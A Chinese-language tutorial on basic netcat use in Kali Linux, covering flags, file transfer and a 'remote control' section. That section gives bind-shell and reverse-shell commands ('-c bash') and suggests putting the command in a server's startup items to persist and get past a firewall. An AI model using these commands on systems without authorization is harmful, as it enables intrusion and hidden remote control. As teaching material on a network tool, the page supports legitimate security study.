標籤:防火牆 網站 雜湊 soc 加密 壓縮包 集中 嗅探 服務
一、簡介nc是netcat的簡寫,有著網路界的瑞士×××美譽。因為它短小精悍、功能實用,被設計為一個簡單、可靠的網路工具。nc 常用的命令有兩個:1、-v 輸出詳細的互動或者出錯資訊2、-n 如果後面是ip地址不會進行dns解析eg:nc -vn 192.168.11.11 8888二、利用nc文本傳輸:類似於socket一個作為服務端,一個作為用戶端。服務端命令:nc -l -p 連接埠用戶端命令: nc -vn ip port拓展:在電子取證的時候會用到。用 | 管道符將用戶端輸出的結果發送到服務端。傳輸檔案:接收方命令: nc -lp 333>1.txt 發送方命令:nc -nv 111.11.11.11 333 <2 .txt三、利用nc實現遠端控制將自己的shell指令碼放在自己的連接埠處等待串連或者接受對方傳送過來的shell視窗來實現遠端控制。方法一; nc -lp 333 -c bash(nc -vn 192.168.22.22 333)(等待對方來串連)方法二:nc -lp 333 (nc -vn -192.145.11.1 333 -c bash)(接受對方的shell視窗)×××思路:可以將該命令寫成指令碼,然後放在伺服器的開機啟動項裡面。因為網站防火牆的存在,進位在外面通過連接埠想裡面發送東西,故可以嘗試第二中方法。tips:在window使用者中應將bash 改為cmd 四、nc工具拓展通過管道符號結合nc命令會產生意想不到的效果比如利用nc命令結合壓縮命令可以發送整個壓縮包。五、缺陷1、明文傳輸,容易被嗅探(可以通過系統加密方法)2、缺乏身分識別驗證機制,不安全,容易被其他人盜用。3、不同版本的nc是不同的、參數也有可能不同。unbutn版本的nc沒有-c六、拓展1、為瞭解決上面的問題,便出現了ncat工具,該工具是nmap工具集中的一個工具。2、命令:伺服器端:ncat -c bash --allow “you ip” - vnl 333 --ssl 用戶端: ncat -vn “ip” “連接埠 ” --ssl 每次串連的雜湊值是會改變的,ncat可以實現的功能都可以通過nc實現。
kail linux 下nc工具的基本使用(安全牛視頻)
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
